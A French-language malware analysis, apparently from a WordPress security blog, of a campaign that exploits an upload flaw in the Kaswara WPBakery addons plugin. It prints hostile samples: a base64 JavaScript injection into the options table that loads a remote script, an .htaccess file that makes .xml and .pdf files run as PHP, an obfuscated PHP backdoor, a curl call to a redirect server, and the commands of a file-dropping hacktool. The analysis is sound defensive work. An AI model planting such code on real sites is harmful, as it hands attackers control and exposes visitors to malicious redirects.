Vulnérable Kaswara Modern WPBakery Page Builder Addons Plugin exploité à l'état sauvage

De retour le 20 avril 2021, nos amis de WPScan ont signalé une grave vulnérabilité sur Kaswara Modern VC Addons, également connu sous le nom de Kaswara Modern WPBakery Page Builder Addons. Il n'est plus disponible chez Codecanyon/Envato, ce qui signifie que si vous l'avez en cours d'exécution, vous devez choisir une alternative.

Cette vulnérabilité permet aux utilisateurs non authentifiés de télécharger des fichiers arbitraires dans le répertoire d'icônes du plugin (./wp-content/uploads/kaswara/icons). Il s'agit du premier indicateur de compromis (IOC) que nos amis de WPScan ont partagé avec nous dans leur rapport.

La possibilité de télécharger des fichiers arbitraires sur un site Web donne au mauvais acteur un contrôle total sur le site, ce qui rend difficile la définition de la charge utile finale de cette infection ; ainsi, nous vous montrerons tout ce que nous avons trouvé jusqu'à présent (nous nous sommes un peu emportés dans la recherche, alors n'hésitez pas à passer à la section IOC si vous ne voulez pas lire jusqu'au bout).

Injection de base de données, fausses applications Android et autres portes dérobées

Merci à notre ami Denis Sinegubko de Sucuri pour avoir signalé le suivi d'injection de base de données utilisé avec cette attaque.

Les acteurs malveillants mettraient à jour l'option 'kaswara-customJS' pour ajouter un extrait malveillant arbitraire de code Javascript. Voici un exemple que nous avons trouvé :

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

Cette chaîne encodée en base64 se traduit par :

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

Et comme cela se produit généralement avec ce type de script, il chargera en chaîne une série d'autres extraits de code Javascript, et la charge utile finale sera soit une publicité malveillante, soit un kit d'exploitation. Ceci est très similaire à ce que Wordfence a rapporté ici.

Dans ce cas, le script est en train de mourir sur hxxp://double-clickd[.]com/ et ne charge aucun mauvais contenu. J'ai trouvé du Javascript suspect appelant ce site depuis début 2020 et les gens le bloquent déjà depuis 2018.

Fausses applications téléchargées sur le site

Les 40 applications Android trouvées sur les sites Web que nous avons examinés étaient de fausses versions de différentes applications, comme AliPay, PayPal, Correos, DHL et bien d'autres, qui ont heureusement été détectées par les fournisseurs d'antivirus les plus populaires selon cette analyse VirusTotal.

Je n'ai pas vérifié les intentions de l'application, mais un examen rapide des autorisations qu'elle demande peut nous donner un aperçu de ce qu'elle pourrait faire :

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Cependant, ces fichiers ne sont pas immédiatement téléchargés à l'aide de l'exploit Kaswara. Une fois le site compromis, les attaquants téléchargent d'abord d'autres outils pour contrôler entièrement le site.

Fichiers téléchargés

Certaines portes dérobées et autres logiciels malveillants ont également été trouvés sur des sites Web compromis par cette vulnérabilité. Je vais partager une analyse rapide des plus populaires et des plus intéressantes dans cet article. Cependant, je veux d'abord me concentrer sur le plus complexe.

Rediriger et fausses applications

Les fausses applications que j'ai trouvées sur plusieurs sites compromis n'ont pas été téléchargées en exploitant la vulnérabilité Kaswara. Ils sont téléchargés sur le site à l'aide d'un hacktool multifonction, qui permet à l'attaquant de télécharger du code à distance (en fournissant une URL ou une chaîne) et de rediriger l'utilisateur vers un site malveillant.

Le fichier peut être facilement identifié par la présence de cette chaîne : base64_decode('MTIz');error_reporting(0); une fonction

Chose intéressante, il randomise tout le reste sauf cela.

Le malware est sur une seule ligne, ce qui est aussi un IOC intéressant si vous recherchez ce type d'anomalie de code.

Pour faciliter la compréhension, j'ai décodé la plupart des parties du code, renommé les fonctions intéressantes et embelli le code. Le malware inclut 6 fonctions différentes, et 5 d'entre elles sont basées sur les valeurs passées sur la $_GET['ts'] . Pour ce document, considérons l'une des nombreuses instances que j'ai trouvées : c.php .

/c.php?ts=kt

Cela ne fait rien et forcera le site à renvoyer une erreur 500 (plus tard sur le code).

/c.php?ts=1

Modifie la valeur de l' $q1a en true pour effectuer une validation de code et envoyer un message OK à l'attaquant.

Dans ce cas, le site distant répond : {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”Code”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Écrit un fichier sur le serveur avec le code fourni par le contenu de $_GET["v"] tant que $_GET["p"] est la somme de contrôle SHA1 de 123 (rappelez-vous que le premier IOC de base64_decode('MTIz') ? est cette somme de contrôle).

/c.php?ts=tt

Écrit 5 Mo de "-" sur le serveur, probablement utilisé pour tester si la fonction de téléchargement fonctionnera sur le serveur.

/c.php?ts=dwm&h=HASH1,HASH2

Lorsque le logiciel malveillant reçoit cette demande, il effectue un test pour vérifier si les fichiers téléchargés ont été correctement écrits sur le serveur. Leurs hachages MD5 doivent être connus et sont envoyés à $_GET['h'] sous forme de valeurs séparées par des virgules.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Télécharge un fichier à partir d'une série de sites Web tiers et l'enregistre sur le serveur en le nommant d'après les 12 derniers caractères du md5 du fichier téléchargé.

C'est la fonction utilisée pour télécharger de fausses applications sur le serveur.

Voici un exemple de demande de téléchargement de fichiers malveillants /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Rediriger l'accès

Si l'option kt ou aucune option n'a été sélectionnée, le code procède à la redirection, qui est réalisée en demandant un blob JSON avec les données nécessaires. Il procède ensuite à la redirection du visiteur à l'aide de la fonction d'en-tête.

La réponse ressemble à ceci : {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

La fonction pour exécuter une requête cURL avec les paramètres nécessaires est celle-ci : Rien d'extraordinaire…

Et cela peut être traduit en cette requête cURL :

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

L'URL finale est, pour autant que j'ai pu tester, aléatoire, mais partage la même caractéristique d'être une fausse page pour un service ou une application populaire.

wp-content/uploads/kaswara/icons/16/javas.xml et wp-content/uploads/kaswara/icons/16/.htaccess

Un fichier XML n'est généralement pas marqué comme une menace potentielle, mais dans ce cas, nous avons un fichier .htaccess spécialement conçu qui modifie la façon dont le serveur Web le voit :

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

En fait, il indique à Apache de comprendre tous les fichiers javas, home ou menus avec xml, php ou pdf comme un fichier PHP à traiter en conséquence et à exécuter. Ainsi, n'importe lequel de ces fichiers présents dans la même structure de répertoires que ce .htaccess sera suspect.

Le fichier javas.xml est identique à certains autres fichiers malveillants téléchargés sur le site. J'ai trouvé que la différence est que certains ont une ou deux lignes vides à la fin du fichier, ce qui rend le hachage traditionnel un peu plus délicat.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

Le code malveillant est masqué à l'aide de chaînes encodées str_rot13 et base64. Il utilise également des valeurs hexadécimales et des opérations mathématiques pour masquer un peu plus les chaînes. La charge utile finale est inconnue car elle créera une fonction basée sur les valeurs d'une requête POST. Cependant, la charge utile semble être la même à chaque fois car elle repose sur une vérification md5 avant de la créer (c42ea979ed982c02632430e9e98a66d6 est le hachage md5).

Conclusion

Comme il s'agit d'une campagne active, au moment de la rédaction de cet article, nous constatons que de plus en plus d'exemples de logiciels malveillants différents sont déposés sur les sites concernés. Certains ne sont que des variations de ce que nous avons ici, tandis que d'autres sont suffisamment intéressants pour une analyse plus approfondie. Recherchez des messages plus petits à venir pour explorer certains de ces autres exemples.

Cela illustre l'importance d'avoir vos extensions mises à jour avec les derniers correctifs de sécurité ; si les développeurs ne publient pas les correctifs en temps opportun ou s'ils sont supprimés du référentiel WordPress.org (ou d'autres marchés), nous vous recommandons fortement de trouver une alternative plus sûre.

Si vous êtes préoccupé par les logiciels malveillants et la vulnérabilité de votre site, consultez les fonctionnalités de sécurité de Jetpack. Jetpack Security fournit une sécurité de site WordPress complète et facile à utiliser, y compris des sauvegardes, une analyse des logiciels malveillants et une protection anti-spam.

Indicateurs de compromis

Vous trouverez ici la liste complète de tous les IOC que nous avons identifiés :